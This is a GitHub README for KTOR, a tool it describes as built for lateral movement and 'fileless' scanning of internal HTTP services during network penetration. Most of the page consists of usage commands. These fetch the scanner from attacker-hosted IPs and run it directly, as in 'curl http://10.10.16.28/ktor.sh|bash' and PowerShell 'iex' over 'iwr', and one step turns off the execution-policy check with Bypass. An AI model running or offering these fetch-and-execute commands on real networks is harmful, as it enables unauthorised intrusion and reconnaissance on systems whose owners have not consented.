Skip to content

MartinxMax/KTOR

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

KTOR

KTOR is a tool specifically designed for lateral movement in Linux. With this tool, you can quickly scan internal HTTP services for further network penetration, achieving fileless scanning.

KTOR for Linux

$ ./ktor.sh -h

alt text

Scan localhost

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

alt text

Scan other machines through the interface

$ curl http://10.10.16.28/ktor.sh|bash -s -- -i eth0 -p 80,8080 -t 100

alt text

KTOR for Windows

PS> Set-ExecutionPolicy Bypass -Scope Process -Force;.\ktor.ps1

alt text

Scan localhost

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Local"

alt text

Scan other machines

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Targets 192.168.0.106 -Ports 80,8080,8000"

alt text

About

KTOR is a tool specifically designed for lateral movement in Linux. With this tool, you can quickly scan internal HTTP services for further network penetration, achieving fileless scanning.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors